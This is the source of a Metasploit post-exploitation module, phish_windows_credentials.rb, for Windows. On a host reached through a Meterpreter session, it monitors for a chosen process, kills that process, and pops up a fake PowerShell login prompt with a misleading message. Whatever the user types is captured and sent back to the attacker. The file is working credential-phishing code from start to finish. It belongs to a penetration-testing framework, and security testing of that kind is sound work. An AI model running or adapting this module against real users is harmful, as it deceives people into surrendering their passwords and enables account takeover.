modules/post/windows/gather/phish_windows_credentials.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Gather User Credentials (phishing)',
'Description' => %q{
This module is able to perform a phishing attack on the target by popping up a loginprompt.
When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.
The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.
},
'License' => MSF_LICENSE,
'Author' => [
'Wesley Neelen <security[at]forsec.nl>', # Metasploit module, @wez3forsec on Twitter
'Matt Nelson' # Original powershell script, @enigma0x3 on Twitter
],
'References' => [ 'URL', 'https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit' ],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
stdapi_sys_process_kill
]
}
}
)
)
register_options(
[
OptString.new('PROCESS', [ false, 'Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)' ]),
OptString.new('DESCRIPTION', [ true, 'Message shown in the loginprompt', '{PROCESS_NAME} needs your permissions to start. Please enter user credentials']),
]
)
register_advanced_options(
[
OptInt.new('TIMEOUT', [true, 'The maximum time (in seconds) to wait for any Powershell scripts to complete', 120])
]
)
end
# Function to run the InvokePrompt powershell script
def execute_invokeprompt_script(description, process, path)
base_script = File.read(File.join(Msf::Config.data_directory, 'post', 'powershell', 'Invoke-LoginPrompt.ps1'))
if process.nil?
sdescription = description.gsub('{PROCESS_NAME} needs your permissions to start. ', '')
psh_script = base_script.gsub('R{DESCRIPTION}', sdescription.to_s) << 'Invoke-LoginPrompt'
else
sdescription = description.gsub('{PROCESS_NAME}', process)
psh_script2 = base_script.gsub('R{DESCRIPTION}', sdescription.to_s) << 'Invoke-LoginPrompt'
psh_script = psh_script2.gsub('R{START_PROCESS}', "start-process \"#{path}\"")
end
compressed_script = compress_script(psh_script)
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, datastore['TIMEOUT'])
while (d = cmd_out.channel.read)
print_good(d.to_s)
end
end
# Function to monitor process creation
def procmon(process, description)
procs = []
existingProcs = []
detected = false
first = true
print_status('Monitoring new processes.')
while detected == false
sleep 1
procs = client.sys.process.processes
procs.each do |p|
if (p['name'] == process) || (process == '*')
if first == true
print_status("#{p['name']} is already running. Waiting on new instances to start")
existingProcs.push(p['pid'])
elsif !existingProcs.include? p['pid']
print_status("New process detected: #{p['pid']} #{p['name']}")
killproc(p['name'], p['pid'], description, p['path'])
detected = true
end
end
end
first = false
end
end
# Function to kill the process
def killproc(process, pid, description, path)
print_status('Killing the process and starting the popup script. Waiting on the user to fill in his credentials...')
client.sys.process.kill(pid)
execute_invokeprompt_script(description, process, path)
end
# Main method
def run
process = datastore['PROCESS']
description = datastore['DESCRIPTION']
# Powershell installed check
if have_powershell?
print_good('PowerShell is installed.')
else
fail_with(Failure::Unknown, 'PowerShell is not installed')
end
# Check whether target system is locked
locked = client.railgun.user32.GetForegroundWindow()['return']
if locked == 0
fail_with(Failure::Unknown, 'Target system is locked. This post module cannot start the loginprompt when the target system is locked.')
end
# Switch to check whether a specific process needs to be monitored, or just show the popup immediatly.
case process
when nil
print_status('Starting the popup script. Waiting on the user to fill in his credentials...')
execute_invokeprompt_script(description, nil, nil)
else
procmon(process, description)
end
end
end